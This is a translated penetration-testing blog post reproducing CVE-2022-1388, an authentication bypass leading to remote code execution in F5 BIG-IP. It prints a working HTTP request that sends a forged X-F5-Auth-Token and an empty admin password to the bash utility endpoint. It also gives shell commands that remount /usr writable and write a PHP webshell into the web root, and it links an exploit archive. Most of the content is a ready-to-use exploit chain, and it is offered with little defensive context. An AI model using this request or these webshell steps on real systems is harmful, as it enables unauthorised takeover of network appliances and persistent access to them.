banner
毅种循环

毅种循环

头顶铁锅接收宇宙能量
HomeArchivesNFT 展示关于

CVE-2022-1388 F5 BIG-IP Unauthenticated RCE Vulnerability & Writing Webshell

#渗透测试394
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
There is a vulnerability in F5 BIG-IP versions 16.1.x, 15.1.x, 14.1.x, 13.1.x, 12.1.x, and 11.6.x that allows unauthorized requests to bypass iControl REST authentication. The vulnerability can be exploited by sending a specific HTTP request. This vulnerability can be used to write a webshell and gain remote code execution. It is similar to another vulnerability known as F5 BIG-IP CVE-2020-5902.

Vulnerability Description#

Vulnerability Description:
In versions prior to F5 BIG-IP 16.1.x 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, as well as all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Unassessed software versions that have reached End of Technical Support (EoTS).

Reproduction Process#

The HTTP request package is as follows:

POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}

image

EXP/POC#

CVE-2022-1388-EXP-main.zip

Webshell Writing#

image
Shell obtained by rebounding.

Webshell writing can refer to another vulnerability F5 BIG-IP CVE-2020-5902
The path for writing is: /usr/local/www

mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr

Access path:
image

image

Reference#

F5 BIG-IP Remote Code Execution Vulnerability Reproduction (CVE-2020-5902)

CVE-2020-5902: F5 BIG-IP RCE Analysis and Research

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.